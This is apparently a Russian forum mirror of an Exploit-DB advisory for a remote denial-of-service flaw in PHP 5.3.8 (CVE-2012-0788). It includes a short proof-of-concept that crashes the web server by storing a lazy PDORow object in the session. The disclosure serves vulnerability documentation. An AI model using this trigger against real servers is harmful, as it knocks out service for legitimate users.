- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36682
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- DOS
- Платформа
- PHP
- CVE
- cve-2012-0788
- Дата публикации
- 2011-09-24
PHP PDORow Object - Remote Denial of Service
PHP:
source: https://www.securityfocus.com/bid/51952/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
PHP 5.3.8 is vulnerable; other versions may also be affected.
<?php
// make a Pdo_Mysql statement before
$result = $stmt->fetch(PDO::FETCH_LAZY);
session_start();
$_SESSION['PDORow'] = $result;
?>
- Источник
- www.exploit-db.com